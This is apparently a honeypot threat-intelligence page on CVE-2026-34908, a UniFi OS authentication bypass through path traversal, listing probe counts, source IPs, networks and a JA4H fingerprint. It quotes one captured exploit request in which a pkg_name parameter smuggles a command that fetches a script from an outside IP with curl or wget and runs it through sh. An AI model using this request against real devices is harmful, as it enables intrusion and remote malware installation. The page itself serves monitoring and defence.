CVE-2026-34908: UniFi OS - Authentication Bypass via Path Traversal (..%2f)

HoneyLabs honeypots recorded 8 probes matching CVE-2026-34908 from 2 distinct source IP addresses in the last 7 days. Severity is rated critical.

This CVE is on CISA's Known Exploited Vulnerabilities list.

Request paths that identify it

  • /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package

Addresses probing it

Source IPProbesNetworkCountry
77.239.124.1097Banatsync SrlThe Netherlands
74.0.48.551Layer7 Technologies IncThe Netherlands

Networks it comes from

ASNOrganisationProbesSource IPs
AS198364Banatsync Srl71
AS40662Layer7 Technologies Inc11

Captured requests

  • /api/auth/validate-sso/..%2f..%2f..%2fproxy/users/api/v2/ucs/update/latest_package?pkg_name=%3b+curl+-s+http://95.155.151.113/unifi%7Csh%7C%7Cwget+-qO-+http://95.155.151.113/unifi%7Csh%7C%7Ccurl+-s+ht…

HTTP client fingerprints (JA4H)

  • ge11nn0400_17292dadbc7b

CVE report

CVE report

Open a specific CVE from the CVE tracker.